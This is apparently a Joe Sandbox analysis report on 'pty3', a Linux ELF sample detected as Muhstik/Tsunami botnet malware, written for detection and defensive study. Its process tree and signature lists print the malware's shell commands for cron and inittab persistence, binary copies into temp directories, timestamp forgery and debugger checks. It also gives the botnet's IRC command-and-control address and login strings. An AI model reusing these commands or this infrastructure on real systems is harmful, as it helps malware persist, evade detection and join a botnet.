Loading ...

Play interactive tourEdit tour

Linux Analysis Report pty3

Overview

General Information

Sample Name:pty3
Analysis ID:544445
MD5:fdd5532c5ec4d3238d2fd36b0a0b187f
SHA1:0e281fa38dcd1c3db0f9059991a351ad4d67238d
SHA256:c01fa3e23232da79e1ee1e722050ab8ac09b90bfebbf93a440bc1316ef7a127c
Tags:elflog4j
Infos:

Detection

Muhstik Tsunami
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Muhstik
Multi AV Scanner detection for submitted file
Yara detected Tsunami
Uses IRC for communication with a C&C
Writes identical ELF files to multiple locations
Sample tries to persist itself using cron
Explicitly modifies time stamps using the "touch" command
Executes the "crontab" command typically for achieving persistence
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:544445
Start date:23.12.2021
Start time:11:30:34
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 57s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pty3
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal96.troj.evad.lin@0/23@14/0
Warnings:
Show All
  • VT rate limit hit for: /run/pty3

Process Tree

  • system is lnxubuntu20
  • pty3 (PID: 5223, Parent: 5118, MD5: fdd5532c5ec4d3238d2fd36b0a0b187f) Arguments: /tmp/pty3
    • pty3 New Fork (PID: 5224, Parent: 5223)
    • sh (PID: 5224, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x strace > /dev/null"
      • sh New Fork (PID: 5225, Parent: 5224)
      • pidof (PID: 5225, Parent: 5224, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x strace
    • pty3 New Fork (PID: 5226, Parent: 5223)
    • sh (PID: 5226, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x tcpdump > /dev/null"
      • sh New Fork (PID: 5227, Parent: 5226)
      • pidof (PID: 5227, Parent: 5226, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x tcpdump
    • pty3 New Fork (PID: 5230, Parent: 5223)
      • pty3 New Fork (PID: 5232, Parent: 5230)
      • sh (PID: 5232, Parent: 5230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -r"
        • sh New Fork (PID: 5235, Parent: 5232)
        • crontab (PID: 5235, Parent: 5232, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -r
    • pty3 New Fork (PID: 5231, Parent: 5223)
      • pty3 New Fork (PID: 5234, Parent: 5231)
      • sh (PID: 5234, Parent: 5231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
        • sh New Fork (PID: 5238, Parent: 5234)
        • crontab (PID: 5238, Parent: 5234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
        • sh New Fork (PID: 5239, Parent: 5234)
        • grep (PID: 5239, Parent: 5234, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /tmp/pty3
        • sh New Fork (PID: 5240, Parent: 5234)
        • grep (PID: 5240, Parent: 5234, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
        • sh New Fork (PID: 5242, Parent: 5234)
          • sh New Fork (PID: 5244, Parent: 5242)
          • crontab (PID: 5244, Parent: 5242, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
        • sh New Fork (PID: 5243, Parent: 5234)
        • crontab (PID: 5243, Parent: 5234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • pty3 New Fork (PID: 5233, Parent: 5223)
    • sh (PID: 5233, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"
      • sh New Fork (PID: 5236, Parent: 5233)
      • cat (PID: 5236, Parent: 5233, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
      • sh New Fork (PID: 5237, Parent: 5233)
      • grep (PID: 5237, Parent: 5233, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /tmp/pty3
    • pty3 New Fork (PID: 5241, Parent: 5223)
    • sh (PID: 5241, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
    • pty3 New Fork (PID: 5245, Parent: 5223)
    • sh (PID: 5245, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
      • sh New Fork (PID: 5246, Parent: 5245)
      • cat (PID: 5246, Parent: 5245, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
    • pty3 New Fork (PID: 5247, Parent: 5223)
    • sh (PID: 5247, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
      • sh New Fork (PID: 5248, Parent: 5247)
      • rm (PID: 5248, Parent: 5247, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
    • pty3 New Fork (PID: 5249, Parent: 5223)
    • sh (PID: 5249, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
      • sh New Fork (PID: 5250, Parent: 5249)
      • touch (PID: 5250, Parent: 5249, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
    • pty3 New Fork (PID: 5251, Parent: 5223)
      • pty3 New Fork (PID: 5252, Parent: 5251)
      • sh (PID: 5252, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
        • sh New Fork (PID: 5255, Parent: 5252)
        • cp (PID: 5255, Parent: 5252, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /dev/shm/pty3
      • pty3 New Fork (PID: 5257, Parent: 5251)
        • pty3 New Fork (PID: 5259, Parent: 5257)
        • sh (PID: 5259, Parent: 5257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5262, Parent: 5259)
          • crontab (PID: 5262, Parent: 5259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5263, Parent: 5259)
          • grep (PID: 5263, Parent: 5259, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /dev/shm/pty3
          • sh New Fork (PID: 5264, Parent: 5259)
          • grep (PID: 5264, Parent: 5259, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5266, Parent: 5259)
            • sh New Fork (PID: 5268, Parent: 5266)
            • crontab (PID: 5268, Parent: 5266, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5267, Parent: 5259)
          • crontab (PID: 5267, Parent: 5259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5258, Parent: 5251)
      • sh (PID: 5258, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5260, Parent: 5258)
        • cat (PID: 5260, Parent: 5258, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5261, Parent: 5258)
        • grep (PID: 5261, Parent: 5258, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /dev/shm/pty3
      • pty3 New Fork (PID: 5265, Parent: 5251)
      • sh (PID: 5265, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5269, Parent: 5251)
      • sh (PID: 5269, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5270, Parent: 5269)
        • cat (PID: 5270, Parent: 5269, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5271, Parent: 5251)
      • sh (PID: 5271, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5272, Parent: 5271)
        • rm (PID: 5272, Parent: 5271, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5273, Parent: 5251)
      • sh (PID: 5273, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5274, Parent: 5273)
        • touch (PID: 5274, Parent: 5273, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5275, Parent: 5251)
      • sh (PID: 5275, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"
        • sh New Fork (PID: 5276, Parent: 5275)
        • cp (PID: 5276, Parent: 5275, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/tmp/pty3
      • pty3 New Fork (PID: 5277, Parent: 5251)
        • pty3 New Fork (PID: 5279, Parent: 5277)
        • sh (PID: 5279, Parent: 5277, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5282, Parent: 5279)
          • crontab (PID: 5282, Parent: 5279, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5283, Parent: 5279)
          • grep (PID: 5283, Parent: 5279, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/tmp/pty3
          • sh New Fork (PID: 5284, Parent: 5279)
          • grep (PID: 5284, Parent: 5279, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5288, Parent: 5279)
            • sh New Fork (PID: 5290, Parent: 5288)
            • crontab (PID: 5290, Parent: 5288, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5289, Parent: 5279)
          • crontab (PID: 5289, Parent: 5279, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5278, Parent: 5251)
      • sh (PID: 5278, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5280, Parent: 5278)
        • cat (PID: 5280, Parent: 5278, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5281, Parent: 5278)
        • grep (PID: 5281, Parent: 5278, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/tmp/pty3
      • pty3 New Fork (PID: 5287, Parent: 5251)
      • sh (PID: 5287, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5291, Parent: 5251)
      • sh (PID: 5291, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5292, Parent: 5291)
        • cat (PID: 5292, Parent: 5291, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5293, Parent: 5251)
      • sh (PID: 5293, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5294, Parent: 5293)
        • rm (PID: 5294, Parent: 5293, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5295, Parent: 5251)
      • sh (PID: 5295, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5296, Parent: 5295)
        • touch (PID: 5296, Parent: 5295, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5297, Parent: 5251)
      • sh (PID: 5297, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/lock/pty3"
        • sh New Fork (PID: 5298, Parent: 5297)
        • cp (PID: 5298, Parent: 5297, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/lock/pty3
      • pty3 New Fork (PID: 5299, Parent: 5251)
        • pty3 New Fork (PID: 5301, Parent: 5299)
        • sh (PID: 5301, Parent: 5299, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5304, Parent: 5301)
          • crontab (PID: 5304, Parent: 5301, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5305, Parent: 5301)
          • grep (PID: 5305, Parent: 5301, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/lock/pty3
          • sh New Fork (PID: 5306, Parent: 5301)
          • grep (PID: 5306, Parent: 5301, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5307, Parent: 5301)
            • sh New Fork (PID: 5309, Parent: 5307)
            • crontab (PID: 5309, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5308, Parent: 5301)
          • crontab (PID: 5308, Parent: 5301, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5300, Parent: 5251)
      • sh (PID: 5300, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5302, Parent: 5300)
        • cat (PID: 5302, Parent: 5300, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5303, Parent: 5300)
        • grep (PID: 5303, Parent: 5300, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/lock/pty3
      • pty3 New Fork (PID: 5310, Parent: 5251)
      • sh (PID: 5310, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5311, Parent: 5251)
      • sh (PID: 5311, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5312, Parent: 5311)
        • cat (PID: 5312, Parent: 5311, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5313, Parent: 5251)
      • sh (PID: 5313, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5314, Parent: 5313)
        • rm (PID: 5314, Parent: 5313, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5315, Parent: 5251)
      • sh (PID: 5315, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5316, Parent: 5315)
        • touch (PID: 5316, Parent: 5315, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5317, Parent: 5251)
      • sh (PID: 5317, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/run/pty3"
        • sh New Fork (PID: 5318, Parent: 5317)
        • cp (PID: 5318, Parent: 5317, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/run/pty3
      • pty3 New Fork (PID: 5319, Parent: 5251)
        • pty3 New Fork (PID: 5321, Parent: 5319)
        • sh (PID: 5321, Parent: 5319, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5324, Parent: 5321)
          • crontab (PID: 5324, Parent: 5321, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5325, Parent: 5321)
          • grep (PID: 5325, Parent: 5321, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/run/pty3
          • sh New Fork (PID: 5326, Parent: 5321)
          • grep (PID: 5326, Parent: 5321, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5328, Parent: 5321)
            • sh New Fork (PID: 5331, Parent: 5328)
            • crontab (PID: 5331, Parent: 5328, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5330, Parent: 5321)
          • crontab (PID: 5330, Parent: 5321, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5320, Parent: 5251)
      • sh (PID: 5320, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5322, Parent: 5320)
        • cat (PID: 5322, Parent: 5320, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5323, Parent: 5320)
        • grep (PID: 5323, Parent: 5320, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/run/pty3
      • pty3 New Fork (PID: 5327, Parent: 5251)
      • sh (PID: 5327, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5329, Parent: 5251)
      • sh (PID: 5329, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5332, Parent: 5329)
        • cat (PID: 5332, Parent: 5329, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5333, Parent: 5251)
      • sh (PID: 5333, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5334, Parent: 5333)
        • rm (PID: 5334, Parent: 5333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5335, Parent: 5251)
      • sh (PID: 5335, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5336, Parent: 5335)
        • touch (PID: 5336, Parent: 5335, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
    • pty3 New Fork (PID: 5253, Parent: 5223)
      • pty3 New Fork (PID: 5254, Parent: 5253)
      • sh (PID: 5254, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/uname -n"
        • sh New Fork (PID: 5256, Parent: 5254)
        • uname (PID: 5256, Parent: 5254, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: /bin/uname -n
  • cleanup

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
    5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_MuhstikYara detected MuhstikJoe Security
      5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
        5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_MuhstikYara detected MuhstikJoe Security
          5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
            Click to see the 19 entries

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: pty3Virustotal: Detection: 42%Perma Link
            Source: pty3ReversingLabs: Detection: 51%

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2034743 ET TROJAN ELF/Muhstik Botnet CnC Activity 192.168.2.23:48714 -> 156.67.220.165:8080
            Uses IRC for communication with a C&CShow sources
            Source: unknownIRC traffic detected: 192.168.2.23:48714 -> 156.67.220.165:8080 NICK x86|LOG|i|0|10263889|galassia USER x01 localhost localhost :muhstik-11052018
            Uses known network protocols on non-standard portsShow sources
            Source: unknownNetwork traffic detected: IRC traffic on port 48714 -> 8080
            Source: unknownNetwork traffic detected: IRC traffic on port 48714 -> 8080
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:57024 -> 45.132.241.68:8080
            Source: global trafficTCP traffic: 192.168.2.23:48714 -> 156.67.220.165:8080
            Source: /tmp/pty3 (PID: 5223)Socket: 127.0.0.1::59000Jump to behavior
            Source: unknownDNS traffic detected: query: l.deutschland-zahlung.net replaycode: Name error (3)
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 45.132.241.68
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 156.67.220.165
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: l.deutschland-zahlung.net
            Source: LOAD without section mappingsProgram segment: 0x100000
            Source: classification engineClassification label: mal96.troj.evad.lin@0/23@14/0

            Persistence and Installation Behavior:

            barindex
            Writes identical ELF files to multiple locationsShow sources
            Source: /usr/bin/cp (PID: 5298)File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /run/lock/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5255)File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /dev/shm/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5276)File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /var/tmp/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5318)File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /run/pty3Jump to dropped file
            Sample tries to persist itself using cronShow sources
            Source: /usr/bin/crontab (PID: 5243)File: /var/spool/cron/crontabs/tmp.001wAFJump to behavior
            Source: /usr/bin/crontab (PID: 5243)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5267)File: /var/spool/cron/crontabs/tmp.FFzEXtJump to behavior
            Source: /usr/bin/crontab (PID: 5267)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5289)File: /var/spool/cron/crontabs/tmp.7EMzq6Jump to behavior
            Source: /usr/bin/crontab (PID: 5289)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5308)File: /var/spool/cron/crontabs/tmp.2HVWUAJump to behavior
            Source: /usr/bin/crontab (PID: 5308)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5330)File: /var/spool/cron/crontabs/tmp.ASDRldJump to behavior
            Source: /usr/bin/crontab (PID: 5330)File: /var/spool/cron/crontabs/rootJump to behavior
            Explicitly modifies time stamps using the "touch" commandShow sources
            Source: /bin/sh (PID: 5250)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5274)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5296)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5316)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5336)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Executes the "crontab" command typically for achieving persistenceShow sources
            Source: /bin/sh (PID: 5235)Crontab executable: /usr/bin/crontab -> crontab -rJump to behavior
            Source: /bin/sh (PID: 5238)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5244)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5243)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
